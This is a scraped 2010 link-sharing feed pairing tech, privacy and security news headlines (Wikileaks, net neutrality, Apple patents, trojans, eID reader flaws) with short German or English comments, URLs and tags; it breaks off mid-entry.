+</p>http://blogs.forbes.com/andygreenberg/2010/08/24/full-body-scan-technology-deployed-in-street-roving-vans/page_shots/2010/08/25/full-bodyscantechnologydeployedinstreet-rovin.pngfull-bodyscantechnologydeployedinstreet-rovin131012010-08-25 11:56:077bürgerrechte, law enforcement, nacktscanner, police, polizeistaat, privacy Die beste Verschlüsselung für eine Nachricht&#8230; : netzpolitik.orgVon russischen Spionen lernen. Steganographie in soz. Netzwerken im großen Stil um Zensur zu umgehen.<p>Von russischen Spionen lernen. Steganographie in soz. Netzwerken im großen Stil um Zensur zu umgehen. +</p>http://www.netzpolitik.org/2010/die-beste-verschlusselung-fur-eine-nachricht/page_shots/2010/08/25/diebesteverschlusselungfureinenachricht82.pngdiebesteverschlusselungfureinenachricht8211012010-08-25 09:59:537censorship privacy steganographySteve Jobs Is Watching You: Apple Seeking to Patent Spyware | Electronic Frontier FoundationIt looks like Apple, Inc., is exploring a new business opportunity: spyware and what we're calling "traitorware." While users were celebrating the new jailbreaking and unlocking exemptions, Apple was quietly preparing to apply for a patent on technology that, among other things, would allow Apple to identify and punish users who take advantage of those exemptions or otherwise tinker with their devices. This patent application does nothing short of providing a roadmap for how Apple can — and presumably will — spy on its customers and control the way its customers use Apple products. <p>It looks like Apple, Inc., is exploring a new business opportunity: spyware and what we're calling "traitorware." While users were celebrating the new jailbreaking and unlocking exemptions, Apple was quietly preparing to apply for a patent on technology that, among other things, would allow Apple to identify and punish users who take advantage of those exemptions or otherwise tinker with their devices. This patent application does nothing short of providing a roadmap for how Apple can — and presumably will — spy on its customers and control the way its customers use Apple products. +</p>http://www.eff.org/deeplinks/2010/08/steve-jobs-watching-you-apple-seeking-patent-0page_shots/2010/08/25/stevejobsiswatchingyouappleseekingtopaten.pngstevejobsiswatchingyouappleseekingtopaten11012010-08-25 09:57:047apple spywareElektronischer Personalausweis: CCC findet Schwachstelle in Leseger&auml;t - Golem.deDer Chaos Computer Club will eine Schwachstelle an den Basisleseräten für den neuen elektronischen Personalausweis gefunden haben. Das hätten gemeinsam mit dem ARD-Magazin Plusminus durchgeführte Tests ergeben. Danach soll es möglich sein, die geheime PIN und andere Daten abzufangen. Das Lesegerät erlaubt es, sich mit dem Personalausweis am heimischen Computer für Onlinegeschäfte zu identifizieren. <p>Der Chaos Computer Club will eine Schwachstelle an den Basisleseräten für den neuen elektronischen Personalausweis gefunden haben. Das hätten gemeinsam mit dem ARD-Magazin Plusminus durchgeführte Tests ergeben. Danach soll es möglich sein, die geheime PIN und andere Daten abzufangen. Das Lesegerät erlaubt es, sich mit dem Personalausweis am heimischen Computer für Onlinegeschäfte zu identifizieren. +</p>http://www.golem.de/1008/77429.htmlpage_shots/2010/08/24/elektronischerpersonalausweiscccfindetschwach.pngelektronischerpersonalausweiscccfindetschwach11012010-08-24 10:07:486ccc eperso hackYemeni assassin hits York man with spam death threat • The RegisterRead your SPAM ...<p>Read your SPAM ... +</p>http://www.theregister.co.uk/2010/08/23/spam_threat/page_shots/2010/08/23/yemeniassassinhitsyorkmanwithspamdeaththre.pngyemeniassassinhitsyorkmanwithspamdeaththre11012010-08-23 18:37:566assasin spam 15 Facts About Net Neutrality [Infographic] Zum Sendungsthema.<p>Zum Sendungsthema. +</p>http://www.readwriteweb.com/archives/15_facts_about_net_neutrality_infographic.phppage_shots/2010/08/23/15factsaboutnetneutralityinfographic.png15factsaboutnetneutralityinfographic11012010-08-23 12:21:496netneutralityheise online - Die Menschheit auf eine neue Stufe bringen: zum 60. Geburtstag von Steve WozniakViel interessanter der Typ, als der andere Apple.<p>Viel interessanter der Typ, als der andere Apple. +</p>http://www.heise.de/newsticker/meldung/Die-Menschheit-auf-eine-neue-Stufe-bringen-zum-60-Geburtstag-von-Steve-Wozniak-1053704.htmlpage_shots/2010/08/23/heiseonline-diemenschheitaufeineneuestufe.pngheiseonline-diemenschheitaufeineneuestufe11012010-08-23 12:20:156anniversary wozGVLN Rao Blog &raquo; Blog Archive &raquo; The &#8220;Ugly face&#8221; of the ECI: Arrest of Hari Prasad for “sting demonstration” Indischer Wahlcomputerhacker für Demo verhaftet. Echt noch ein weiter Weg ins Informationszeitalter. Die Helden werden verhaftet.<p>Indischer Wahlcomputerhacker für Demo verhaftet. Echt noch ein weiter Weg ins Informationszeitalter. Die Helden werden verhaftet. +</p>http://www.indianevm.com/blogs/?p=402page_shots/2010/08/22/gvlnraoblograquoblogarchiveraquothe.pnggvlnraoblograquoblogarchiveraquothe11012010-08-22 08:53:146arrest, india, voting system20 Minuten Online - So ärgert man Neonazis - Auslands/Mannheimer Strasse/Geschwister-Scholl-Strasse/ in Riesa. Dort sitzt der NPD-Verlag Deutsche Stimme seit zehn Jahren seinen Sitz. Zudem sind mehrere Kader der Rechtsextremisten unter der Adresse erreichbar. Das auf Initiative einer CDU-Bürgermeisterin.<p>s/Mannheimer Strasse/Geschwister-Scholl-Strasse/ in Riesa. Dort sitzt der NPD-Verlag Deutsche Stimme seit zehn Jahren seinen Sitz. Zudem sind mehrere Kader der Rechtsextremisten unter der Adresse erreichbar. Das auf Initiative einer CDU-Bürgermeisterin. +</p>http://www.20min.ch/news/ausland/story/So-aergert-man-Neonazis-17290254page_shots/2010/08/21/20minutenonline-soargertmanneonazis-ausla_.png20minutenonline-soargertmanneonazis-ausla11012010-08-21 14:50:076cdu nazisReport: Trojan a factor in fatal Spanair crash? | Security - CNET NewsThe Spanair plane crash that killed 154 people two years ago Friday may have been partly caused by malware, according to reports. +El Pais, Spain's top newspaper, reported Friday that Spanair's mainframe was contaminated with Trojans at the time that Flight JK 5022 to Gran Canaria crashed just after take-off at Madrid's Barajas airport. +The mainframe was supposed to raise the alarm when three similar technical problems were noted, but did not do so due to the infestation, El Pais said.<p>The Spanair plane crash that killed 154 people two years ago Friday may have been partly caused by malware, according to reports. + El Pais, Spain's top newspaper, reported Friday that Spanair's mainframe was contaminated with Trojans at the time that Flight JK 5022 to Gran Canaria crashed just after take-off at Madrid's Barajas airport. + The mainframe was supposed to raise the alarm when three similar technical problems were noted, but did not do so due to the infestation, El Pais said. +</p>http://news.cnet.com/8301-1009_3-20014237-83.htmlpage_shots/2010/08/21/reporttrojanafactorinfatalspanaircrash.pngreporttrojanafactorinfatalspanaircrash11012010-08-21 13:15:196trojanBlocked Street View Images in Germany May Get Published - NYTimes.comYou can't escape Streetview. + +But Best, a 37-year-old IT consultant who lives in Berlin, has recruited a 400-strong crew of volunteers who plan to take photographs of the areas that Google will excise from Street View. They plan to post those photos within Street View, which accepts user-generated photos. + +"I'm accepting that some people are going to hate me," Best said during an interview on Friday. "I can live with that."<p>You can't escape Streetview. +</p> +<p>But Best, a 37-year-old IT consultant who lives in Berlin, has recruited a 400-strong crew of volunteers who plan to take photographs of the areas that Google will excise from Street View. They plan to post those photos within Street View, which accepts user-generated photos. +</p> +<p>"I'm accepting that some people are going to hate me," Best said during an interview on Friday. "I can live with that." +</p>http://www.nytimes.com/external/idg/2010/08/20/20idg-blocked-street-view-images-in-germany-may-get-publis-54923.htmlpage_shots/2010/08/21/blockedstreetviewimagesingermanymaygetpubl.pngblockedstreetviewimagesingermanymaygetpubl11012010-08-21 00:43:566google photo streetviewHD Moore: Critical bug in 40 different Windows apps | ZDNet Windows Shell und 39 weitere Win-Programme erlauben remote Exploitation, so HD Moore. Open my shared folder and I 0wn you :) +[Register](http://www.theregister.co.uk/2010/08/24/binary_planting_attack_advisory/) has the confirmation by MS<p>Windows Shell und 39 weitere Win-Programme erlauben remote Exploitation, so HD Moore. Open my shared folder and I 0wn you :) + <a href="http://www.theregister.co.uk/2010/08/24/binary_planting_attack_advisory/">Register</a> has the confirmation by MS +</p>http://www.zdnet.com/blog/security/hd-moore-critical-bug-in-40-different-windows-apps/7188page_shots/2010/08/24/no_page_shot.pnghdmoorecriticalbugin40differentwindowsapp11012010-08-20 21:36:336microsoft vulnerability windowsUSB Dongle Claims to Deliver First Easy Hack for PS3 | Gadget Lab | Wired.comLooks like the PS3 is hacked via a USB dongle. One can "back up" games. No more than a Youtube video exists.<p>Looks like the PS3 is hacked via a USB dongle. One can "back up" games. No more than a Youtube video exists. +</p>http://www.wired.com/gadgetlab/2010/08/ps3-dongle/page_shots/2010/08/20/usbdongleclaimstodeliverfirsteasyhackforp.pngusbdongleclaimstodeliverfirsteasyhackforp11012010-08-20 21:28:286hack ps3 sonyApple may be looking to lock out unauthorized iOS usersApple patentiert Biometrie. + +Apple has applied for a patent on a method to differentiate between authorized and unauthorized users of a particular iOS device. Once an unauthorized user is detected, the device can then automatically disable certain features or send notifications to Twitter or other services. + +The patent, titled "Systems and Methods for Identifying Unauthorized Users of an Electronic Device," describes several ways a device could sense who is using an iPhone or iPad. Among the methods considered are voice print analysis, photo analysis, heartbeat analysis (!), hacking attempts, or even "noting particular activities that can indicate suspicious behavior."<p>Apple patentiert Biometrie. +</p> +<p>Apple has applied for a patent on a method to differentiate between authorized and unauthorized users of a particular iOS device. Once an unauthorized user is detected, the device can then automatically disable certain features or send notifications to Twitter or other services. +</p> +<p>The patent, titled "Systems and Methods for Identifying Unauthorized Users of an Electronic Device," describes several ways a device could sense who is using an iPhone or iPad. Among the methods considered are voice print analysis, photo analysis, heartbeat analysis (!), hacking attempts, or even "noting particular activities that can indicate suspicious behavior." +</p>http://arstechnica.com/apple/news/2010/08/apple-considering-identification-of-unauthorized-ios-users.arspage_shots/2010/08/20/applemaybelookingtolockoutunauthorizedios.pngapplemaybelookingtolockoutunauthorizedios11012010-08-20 21:14:456apple biometrieDatenleck bei Versicherung: Tausende Kundendaten im NetzAuf einem Server der Versicherung Alte Leipziger standen bis zum Donnerstagnachmittag rund 3600 Versicherungsanträge in einem Unterverzeichnis ungeschützt zum Download bereit. Die Anträge wurden über den Tarifrechner der Sparte Rechtsschutz-Union aufgenommen und enthielten vertrauliche Daten wie etwa Bankverbindung, Beruf, Fahrzeuge, eventuelle Vorschäden sowie den bisherigen Versicherer des Antragsstellers. Auch Geburtsdatum, Nationalität, Familienstand und Angaben zu den Kindern fanden sich in den Anträgen.<p>Auf einem Server der Versicherung Alte Leipziger standen bis zum Donnerstagnachmittag rund 3600 Versicherungsanträge in einem Unterverzeichnis ungeschützt zum Download bereit. Die Anträge wurden über den Tarifrechner der Sparte Rechtsschutz-Union aufgenommen und enthielten vertrauliche Daten wie etwa Bankverbindung, Beruf, Fahrzeuge, eventuelle Vorschäden sowie den bisherigen Versicherer des Antragsstellers. Auch Geburtsdatum, Nationalität, Familienstand und Angaben zu den Kindern fanden sich in den Anträgen. +</p>http://www.heise.de/newsticker/meldung/Datenleck-bei-Versicherung-Tausende-Kundendaten-im-Netz-1062979.htmlpage_shots/2010/08/20/datenleckbeiversicherungtausendekundendateni.pngdatenleckbeiversicherungtausendekundendateni11012010-08-20 20:55:156dataloss insuranceheise online - Intel kauft McAfeeEigentlich nur wegen dem Witz: + Intel CEO: "We need antivirus, can someone buy me McAfee?" Few hours later: "Done." "Great, which version?" "Version ... ?"<p>Eigentlich nur wegen dem Witz: + Intel CEO: "We need antivirus, can someone buy me McAfee?" Few hours later: "Done." "Great, which version?" "Version ... ?" +</p>http://www.heise.de/newsticker/meldung/Intel-kauft-McAfee-1062127.htmlpage_shots/2010/08/20/heiseonline-intelkauftmcafee.pngheiseonline-intelkauftmcafee11012010-08-20 17:36:336antivirus intel Einstieg der Musikindustrie in die US-Debatte zur Netzneutralität : netzpolitik.orgWeil es zum Thema passt. Musikindustrie in den Staaten kommt mit KiPo und Terroristen...<p>Weil es zum Thema passt. Musikindustrie in den Staaten kommt mit KiPo und Terroristen... +</p>http://www.netzpolitik.org/2010/einstieg-der-musikindustrie-in-die-us-debatte-zur-netzneutralitat/page_shots/2010/08/20/einstiegdermusikindustrieindieus-debattezu.pngeinstiegdermusikindustrieindieus-debattezu11012010-08-20 17:31:576contentmafia netneutralityWikipedia verliert seine Autoren: Der Reiz des Anfangs ist verloren - Digitales Denken - Feuilleton - FAZ.NETIn der englischsprachigen Wikipedia, der weltweit größten Gemeinschaft mit über drei Millionen verfassten Beiträgen, ist von einem ernsthaften Autorenschwund die Rede. Zum ersten Mal in der Geschichte der freien Enzyklopädie werden mehr Beiträge gelöscht als erstellt, berichtet das amerikanische Nachrichtenmagazin „Newsweek" + +Deutsche Wikipedia: Der Mitmachwille fällt bei Wikipedia von sechs Prozent aller Nutzer im Vorjahr auf drei Prozent im bisherigen Verlauf dieses Jahres ab.<p>In der englischsprachigen Wikipedia, der weltweit größten Gemeinschaft mit über drei Millionen verfassten Beiträgen, ist von einem ernsthaften Autorenschwund die Rede. Zum ersten Mal in der Geschichte der freien Enzyklopädie werden mehr Beiträge gelöscht als erstellt, berichtet das amerikanische Nachrichtenmagazin „Newsweek" +</p> +<p>Deutsche Wikipedia: Der Mitmachwille fällt bei Wikipedia von sechs Prozent aller Nutzer im Vorjahr auf drei Prozent im bisherigen Verlauf dieses Jahres ab. +</p>http://www.faz.net/s/RubCEB3712D41B64C3094E31BDC1446D18E/Doc~EF725CAAD41704AFD9861AF876270ECFF~ATpl~Ecommon~Scontent.htmlpage_shots/2010/08/20/wikipediaverliertseineautorenderreizdesanf.pngwikipediaverliertseineautorenderreizdesanf11012010-08-20 17:03:126wikipediaRheinland-Pfalz vor Quellen-TKÜ und Online-DurchsuchungQuellen-TKÜ und Online Durchsuchung in Rheinland-Pfalz. Als ob es die Ohrfeige vom BVG nie gegeben hätte...<p>Quellen-TKÜ und Online Durchsuchung in Rheinland-Pfalz. Als ob es die Ohrfeige vom BVG nie gegeben hätte... +</p>http://www.heise.de/security/meldung/Rheinland-Pfalz-vor-Quellen-TKUe-und-Online-Durchsuchung-1062123.htmlpage_shots/2010/08/19/rheinland-pfalzvorquellen-tkuundonline-durchsu____.pngrheinland-pfalzvorquellen-tkuundonline-durchsu11012010-08-19 17:35:446tkü trojanMedal of Honor ahmt Irak-Video "Collateral Murder" nachIn den USA ist Medal of Honor bereits vor seiner Veröffentlichung in die Kritik geraten – nicht wegen der ästhetischen Nähe zum Wikileaks-Video, sondern weil es Spielern erlaubt, im Mehrspielermodus auch auf Seiten der Taliban zu kämpfen und auf US-Soldaten zu schießen. <p>In den USA ist Medal of Honor bereits vor seiner Veröffentlichung in die Kritik geraten – nicht wegen der ästhetischen Nähe zum Wikileaks-Video, sondern weil es Spielern erlaubt, im Mehrspielermodus auch auf Seiten der Taliban zu kämpfen und auf US-Soldaten zu schießen. +</p>http://www.heise.de/newsticker/meldung/Gamescom-Medal-of-Honor-ahmt-Irak-Video-Collateral-Murder-nach-1061759.htmlpage_shots/2010/08/19/medalofhonorahmtirak-videocollateralmurder.pngmedalofhonorahmtirak-videocollateralmurder141012010-08-19 15:29:436 + ThaiLeaks + Thailand blocks Wikileaks - thaileaks.info launched. <p>Thailand blocks Wikileaks - thaileaks.info launched. +</p>http://thaileaks.info/page_shots/2010/08/19/thaileaks.pngthaileaks11012010-08-19 14:56:376thailand wikileaks Pirate Party Strikes Hosting Deal With Wikileaks | TorrentFreak During his visit to the the Swedish capital Stockholm, Wikileaks spokesman Julian Assange struck a deal with the local Pirate Party. The Party, which participates in the national elections next month, will host several new Wikileaks servers to protect the freedom of the press and help the whistleblower site to carry out its operation.<p>During his visit to the the Swedish capital Stockholm, Wikileaks spokesman Julian Assange struck a deal with the local Pirate Party. The Party, which participates in the national elections next month, will host several new Wikileaks servers to protect the freedom of the press and help the whistleblower site to carry out its operation. +</p>http://torrentfreak.com/pirate-party-strikes-hosting-deal-with-wikileaks-100817/page_shots/2010/08/19/piratepartystrikeshostingdealwithwikileak.pngpiratepartystrikeshostingdealwithwikileak11012010-08-19 14:45:286pirateparty wikilieaksDuisburg scheitert an Bloggern - Aufruhr im NetzDas es echt noch Leute gibt, die denken, sie könnten Daten aus dem Netz klagen... m( +<p>Das es echt noch Leute gibt, die denken, sie könnten Daten aus dem Netz klagen... m( +</p>http://www.sueddeutsche.de/medien/duisburg-scheitert-an-bloggern-aufruhr-im-netz-1.989815page_shots/2010/08/18/duisburgscheitertanbloggern-aufruhrimnetz___________.pngduisburgscheitertanbloggern-aufruhrimnetz11012010-08-18 22:37:196blog loveparadeEric Schmidt: nur Namenwechsel wird uns in Zukunft helfenDer Google-CEO lässt ja nur noch solche Schoten von sich m)<p>Der Google-CEO lässt ja nur noch solche Schoten von sich m) +</p>http://www.telegraph.co.uk/technology/google/7951269/Young-will-have-to-change-names-to-escape-cyber-past-warns-Googles-Eric-Schmidt.htmlpage_shots/2010/08/18/ericschmidtnurnamenwechselwirdunsinzukunft.pngericschmidtnurnamenwechselwirdunsinzukunft141012010-08-18 22:07:306Silent Bug Fixing vom FeinstenLokaler root-exploit für Linux wohl schon seit 2.6.0<p>Lokaler root-exploit für Linux wohl schon seit 2.6.0 +</p>http://www.heise.de/newsticker/meldung/Root-Rechte-durch-Linux-Kernel-Bug-1061153.htmlpage_shots/2010/08/18/silentbugfixingvomfeinsten.pngsilentbugfixingvomfeinsten11012010-08-18 20:52:166exploit linuxGoogle TV: US-Sender befürchteten dass ihre Sendungen in der Flut der Internet-Inhalte untergehenhttp://www.heise.de/newsticker/meldung/Bericht-Widerstaende-gegen-Google-TV-1061728.htmlpage_shots/2010/08/18/googletvus-senderbefurchtetendassihresendun.pnggoogletvus-senderbefurchtetendassihresendun141012010-08-18 20:25:366Prosecutor: no charges in webcam spy scandalFollow up: + +Federal authorities announced Tuesday they will not prosecute administrators connected to a webcam spying scandal at a suburban Philadelphia school district. + +Prosecutors and the FBI opened an inquiry following a February privacy lawsuit accusing Lower Merion School District officials of spying on students with webcams on the 2,300 district-issued MacBooks. The lawyers who filed the lawsuit claim the district secretly snapped thousands of webcam images of students, including images of youths at home, in bed or even "partially dressed."<p>Follow up: +</p> +<p>Federal authorities announced Tuesday they will not prosecute administrators connected to a webcam spying scandal at a suburban Philadelphia school district. +</p> +<p>Prosecutors and the FBI opened an inquiry following a February privacy lawsuit accusing Lower Merion School District officials of spying on students with webcams on the 2,300 district-issued MacBooks. The lawyers who filed the lawsuit claim the district secretly snapped thousands of webcam images of students, including images of youths at home, in bed or even "partially dressed." +</p>http://arstechnica.com/tech-policy/news/2010/08/prosecutor-no-charges-in-webcam-spy-scandal.arspage_shots/2010/08/18/prosecutornochargesinwebcamspyscandal.pngprosecutornochargesinwebcamspyscandal11012010-08-18 17:46:206spy webcamClub Mate zur Löschung in WP vorgeschlagenDie WP hat echt einen komplett an der Waffel.<p>Die WP hat echt einen komplett an der Waffel. +</p>http://de.wikipedia.org/wiki/Club-Matepage_shots/2010/08/18/clubmatezurloschunginwpvorgeschlagen.pngclubmatezurloschunginwpvorgeschlagen11012010-08-18 11:56:376mate wikipediaFirst smartphone trojan detectedNot a PoC. Mediaplayer for Android phones sends SMS to premium numbers.<p>Not a PoC. Mediaplayer for Android phones sends SMS to premium numbers. +</p>http://www.securecomputing.net.au/News/224996,first-smartphone-trojan-detected.aspxpage_shots/2010/08/18/no_page_shot.pngfirstsmartphonetrojandetectedsmartphone11012010-08-18 11:00:456android google phone Scientists hack into cars' computers -- control brakes, engine - CSMonitor.com + Break into car board computers via tire sensors [Register](http://www.theregister.co.uk/2010/08/13/car_sensor_wireless_hack/) and maybe soon remotely control the car.<p>Break into car board computers via tire sensors <a href="http://www.theregister.co.uk/2010/08/13/car_sensor_wireless_hack/">Register</a> and maybe soon remotely control the car. +</p>http://www.csmonitor.com/USA/2010/0813/Scientists-hack-into-cars-computers-control-brakes-enginepage_shots/2010/08/18/scientistshackintocarscomputers-co.pngscientistshackintocarscomputers-co11012010-08-18 10:58:406cars, hack, onboard, remote control, wirelessNetworkSolutions Sites Hacked By Wicked Widget &mdash; Krebs on SecurityNetwork Solutions distributed malware. They do domain parking. +Parked domains are registered but contain no owner content. Network Solutions — like many companies that bundle Web site hosting and domain registration services – includes ads and other promotional content on these sites until customers add their own. + + +Armorize said it traced the problem to the “Small Business Success Index” widget, an application that Network Solutions makes available to site owners through its GrowSmartBusiness.com blog. +Armorize founder and chief executive Wayne Huang said Google and Yahoo! search results indicate anywhere from 500,000 to 5 million Network Solutions domains may have been serving the malware-infected widget. <p>Network Solutions distributed malware. They do domain parking. + Parked domains are registered but contain no owner content. Network Solutions — like many companies that bundle Web site hosting and domain registration services – includes ads and other promotional content on these sites until customers add their own. +</p> +<p>Armorize said it traced the problem to the “Small Business Success Index” widget, an application that Network Solutions makes available to site owners through its GrowSmartBusiness.com blog. + Armorize founder and chief executive Wayne Huang said Google and Yahoo! search results indicate anywhere from 500,000 to 5 million Network Solutions domains may have been serving the malware-infected widget. +</p>http://krebsonsecurity.com/2010/08/networksolutions-sites-hacked-by-wicked-widget/page_shots/2010/08/18/networksolutionssiteshackedbywickedwidgetmd.pngnetworksolutionssiteshackedbywickedwidgetmd11012010-08-18 10:55:476malwareGovernment Uses Social Networking Sites for More than Investigations | Electronic Frontier Foundation[Heise:](http://www.heise.de/newsticker/meldung/Polizeibehoerden-forcieren-verdeckte-und-offene-Online-Ermittlungen-1060763.html) +Sie sollen weiteren Aufschluss über Tätigkeiten von US-Sicherheitsbehörden im Netz geben. Dabei geht es etwa um Einzelheiten (PDF-Datei), wie die CIA das 2005 ins Leben gerufene "Open Source Center" nutzt, um aus öffentlich verfügbaren Internetquellen wie Blogs, Chat-Foren oder sozialen Netzwerken gezielt personenbezogene Informationen zu sammeln und auszuwerten. Zugriff auf die dahinter stehende Datenbank und darin eingespeiste Analysen, Videos, Übersetzungen oder Presseübersichten haben demnach rund 15.000 US-Regierungsangestellte von der kommunalen bis hin zur Bundesebene. Die Quellen würden bis Mitte der 1990er Jahre zurückreichen. + +Ein anderes Papier (PDF-Datei) zeigt, dass das FBI in E-Mails großes Interesse am "Dark Web Project" der University of Arizona offenbart hat. Dabei geht es um einen Versuch von Computerwissenschaftlern, alle Terrorismus-bezogenen Inhalte aus dem Web systematisch zusammenzutragen und zu analysieren. Gelobt wird an dem Projekt vor allem seine Effizienz, Kommunikationsforen zu durchsuchen und auch die "verborgenen Ecken des Internets" zu erschließen. Es werde sogar an Werkzeugen gearbeitet, um die Erzeuger eigentlich anonymer Online-Informationen zu entschlüsseln. In dem Schreiben von 2007 hält es die US-Polizeibehörde für besonders aufschlussreich, entsprechende Hilfsmittel mit den eigenen Ressourcen zur "Ausnutzung" von Internet-Daten zu verknüpfen. Für die EFF ist das ein weiterer Hinweis darauf, dass US-Ermittler inner- und außerhalb des Strafverfolgungskontextes Unmengen an Daten aus dem Netz durchforsten.<p><a href="http://www.heise.de/newsticker/meldung/Polizeibehoerden-forcieren-verdeckte-und-offene-Online-Ermittlungen-1060763.html">Heise:</a> + Sie sollen weiteren Aufschluss über Tätigkeiten von US-Sicherheitsbehörden im Netz geben. Dabei geht es etwa um Einzelheiten (PDF-Datei), wie die CIA das 2005 ins Leben gerufene "Open Source Center" nutzt, um aus öffentlich verfügbaren Internetquellen wie Blogs, Chat-Foren oder sozialen Netzwerken gezielt personenbezogene Informationen zu sammeln und auszuwerten. Zugriff auf die dahinter stehende Datenbank und darin eingespeiste Analysen, Videos, Übersetzungen oder Presseübersichten haben demnach rund 15.000 US-Regierungsangestellte von der kommunalen bis hin zur Bundesebene. Die Quellen würden bis Mitte der 1990er Jahre zurückreichen. +</p> +<p>Ein anderes Papier (PDF-Datei) zeigt, dass das FBI in E-Mails großes Interesse am "Dark Web Project" der University of Arizona offenbart hat. Dabei geht es um einen Versuch von Computerwissenschaftlern, alle Terrorismus-bezogenen Inhalte aus dem Web systematisch zusammenzutragen und zu analysieren. Gelobt wird an dem Projekt vor allem seine Effizienz, Kommunikationsforen zu durchsuchen und auch die "verborgenen Ecken des Internets" zu erschließen. Es werde sogar an Werkzeugen gearbeitet, um die Erzeuger eigentlich anonymer Online-Informationen zu entschlüsseln. In dem Schreiben von 2007 hält es die US-Polizeibehörde für besonders aufschlussreich, entsprechende Hilfsmittel mit den eigenen Ressourcen zur "Ausnutzung" von Internet-Daten zu verknüpfen. Für die EFF ist das ein weiterer Hinweis darauf, dass US-Ermittler inner- und außerhalb des Strafverfolgungskontextes Unmengen an Daten aus dem Netz durchforsten. +</p>http://www.eff.org/deeplinks/2010/08/government-monitors-much-more-social-networkspage_shots/2010/08/17/governmentusessocialnetworkingsitesformoret.pnggovernmentusessocialnetworkingsitesformoret11012010-08-17 21:22:016cia eff fbiTargeted Attack Nets 3,000 Online Banking Customers - DarkReadingZeus Trojan erbeutet mit 3000 Kunden über $ 1 Mio. at bank in U.K.<p>Zeus Trojan erbeutet mit 3000 Kunden über $ 1 Mio. at bank in U.K. +</p>http://www.darkreading.com/smb-security/security/attacks/showArticle.jhtml?articleID=226600381page_shots/2010/08/17/targetedattacknets3000onlinebankingcustomer.pngtargetedattacknets3000onlinebankingcustomer11012010-08-17 20:52:256bank trojanGermany bans BlackBerrys and iPhones on snooping fears • The RegisterLieber Minister: Bitte nimm kein Blackberry, iPhone oder (Android haben wir vergessen). Dafür haben wir tolle Phones von T-Systems, die sonst keiner mag. +The German government has advised ministers not to use BlackBerry and iPhone devices due to “a dramatic increase of attacks against” its networks. + +A general ban on the use of smartphones in certain German ministries is also being considered, Federal Interior Minister Thomas de Maizière confirmed to the country’s business daily newspaper Handelsblatt yesterday. + +He said that ministers and senior civil servants had been told to instead use Simko2 gadgets offered by T-Systems, following advice from the German federal office for information security (BSI).<p>Lieber Minister: Bitte nimm kein Blackberry, iPhone oder (Android haben wir vergessen). Dafür haben wir tolle Phones von T-Systems, die sonst keiner mag. + The German government has advised ministers not to use BlackBerry and iPhone devices due to “a dramatic increase of attacks against” its networks. +</p> +<p>A general ban on the use of smartphones in certain German ministries is also being considered, Federal Interior Minister Thomas de Maizière confirmed to the country’s business daily newspaper Handelsblatt yesterday. +</p> +<p>He said that ministers and senior civil servants had been told to instead use Simko2 gadgets offered by T-Systems, following advice from the German federal office for information security (BSI). +</p>http://www.theregister.co.uk/2010/08/10/german_government_mulls_blackberry_iphone_ban/page_shots/2010/08/17/germanybansblackberrysandiphonesonsnoopingf.pnggermanybansblackberrysandiphonesonsnoopingf11012010-08-17 20:49:096bsi iphone eco-Positionspapier zur Netzneutralität : netzpolitik.orgPasst zum Sendungsthema.<p>Passt zum Sendungsthema. +</p>http://www.netzpolitik.org/2010/eco-positionspapier-zur-netzneutralitat/page_shots/2010/08/17/eco-positionspapierzurnetzneutralitatnetzpo.pngeco-positionspapierzurnetzneutralitatnetzpo11012010-08-17 20:08:286eco netneutralityWorlds first 20 minute voice call from a Free Software GSM stack on a phone As Dieter Spaar has pointed out in a mailing list post on the OsmocomBB developer list, he has managed to get a first alpha version of TCH (Traffic Channel) code released, supporting the FR and EFR GSM codecs. + +What this means in human readable language: He can actually make voice calls from a mobile phone that runs the Free Software OsmocomBB GSM stack on its baseband processor. This is a major milestone in the history of our project.<p>As Dieter Spaar has pointed out in a mailing list post on the OsmocomBB developer list, he has managed to get a first alpha version of TCH (Traffic Channel) code released, supporting the FR and EFR GSM codecs. +</p> +<p>What this means in human readable language: He can actually make voice calls from a mobile phone that runs the Free Software OsmocomBB GSM stack on its baseband processor. This is a major milestone in the history of our project. +</p>http://laforge.gnumonks.org/weblog/2010/08/14/#20100814-dieter_tch_voice_callpage_shots/2010/08/17/haraldweltesblog_.pngharaldweltesblog11012010-08-17 14:27:136free gsm voicePolizeigewerkschaft will Google-Streetview für virtuelle Streifenfahrten nutzenkeine Worte<p>keine Worte +</p>http://www.bitterlemmer.net/wp/2010/08/15/polizeigewerkschaft-will-google-streetview-fur-virtuelle-streifenfahrten-nutzen/page_shots/2010/08/17/polizeigewerkschaftwillgoogle-streetviewfurvir.pngpolizeigewerkschaftwillgoogle-streetviewfurvir11012010-08-17 14:17:016polizeigewerkschaft streetviewResearchers use smudge attack, identify Android passcodes 68 percent of the time | ZDNet Diese Fingerwisch-Sperre am Android wurde in 68% aller Fälle gehackt, nachdem sie Bilder vom Display in div. Spektren gemacht haben.<p>Diese Fingerwisch-Sperre am Android wurde in 68% aller Fälle gehackt, nachdem sie Bilder vom Display in div. Spektren gemacht haben. +</p>http://www.zdnet.com/blog/security/researchers-use-smudge-attack-identify-android-passcodes-68-percent-of-the-time/7165page_shots/2010/08/17/researchersusesmudgeattackidentifyandroidpa.pngresearchersusesmudgeattackidentifyandroidpa11012010-08-17 14:04:326androidHacker pretends to be Axl Rose and Cancels Guns N Roses Tour Via Twitter on Spoonfed - Things to do in LondonAxel Rose's Twitter account gehackt und Tour abgesagt. (Das ist der Typ mit Kocking on heavens door...)<p>Axel Rose's Twitter account gehackt und Tour abgesagt. (Das ist der Typ mit Kocking on heavens door...) +</p>http://www.spoonfed.co.uk/spooners/spoonfed-live-music-team-8190/hacker-pretends-to-be-axl-rose-and-cancels-guns-n-roses-tour-via-twitter-3546/page_shots/2010/08/17/hackerpretendstobeaxlroseandcancelsgunsn.pnghackerpretendstobeaxlroseandcancelsgunsn11012010-08-17 14:02:216guns'n'roses twitter Datenschutz-Problem gelöst: Einfach mal den Namen ändern : netzpolitik.orgSchmidt: Leute sollten mit 18 ihren Namen wechseln, damit ihre Jugendsünden nicht mehr in Netz auffindbar sind.<p>Schmidt: Leute sollten mit 18 ihren Namen wechseln, damit ihre Jugendsünden nicht mehr in Netz auffindbar sind. +</p>http://www.netzpolitik.org/2010/datenschutz-problem-geloest-einfach-mal-den-namen-aendern/page_shots/2010/08/17/datenschutz-problemgelosteinfachmaldenname.pngdatenschutz-problemgelosteinfachmaldenname11012010-08-17 13:56:116google schmidtRIAA will zwangsweise UKW-Empfänger in 